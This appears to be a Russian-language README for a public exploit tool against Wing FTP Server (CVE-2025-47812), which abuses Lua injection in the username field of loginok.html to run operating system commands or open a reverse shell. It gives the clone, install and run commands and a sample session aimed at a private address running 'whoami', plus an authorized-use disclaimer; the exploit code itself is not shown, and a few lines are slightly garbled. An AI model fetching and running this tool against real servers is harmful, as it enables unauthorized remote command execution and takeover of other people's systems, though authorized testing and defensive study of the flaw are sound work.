
Wing FTP Server RCE via Lua Injection
Этот эксплойт использует уязвимость внедрения Lua в обработчике входа (loginok.html) Wing FTP Server для выполнения произвольных команд операционной системы или получения обратной оболочки (reverse shell). Он злоупотребляет неочищенным выполнением Lua-кода через параметр username.
pip3Установите необходимые пакеты с помощью:
pip3 install -r requirements.txt
Или вручную:
pip3 install requests colorama
git clone https://github.com/0xgh057r3c0n/CVE-2025-47812.git
cd CVE-2025-47812
python3 CVE-2025-47812.py
Запустите скрипт:
python3 CVE-2025-47812.py
whoami, id)Target URL (e.g., http://localhost:5466): http://192.168.1.100:5466
Username (e.g., anonymous): anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
Этот инструмент предоставляется исключительно для образовательных целей и авторизованного тестирования безопасности. Вы несете ответственность за свои действия. Используйте только на системах, которые вам принадлежат или на тестирование которых у вас есть разрешение.
Этот проект распространяется под лицензией MIT. Подробности см. в файле LICENSE.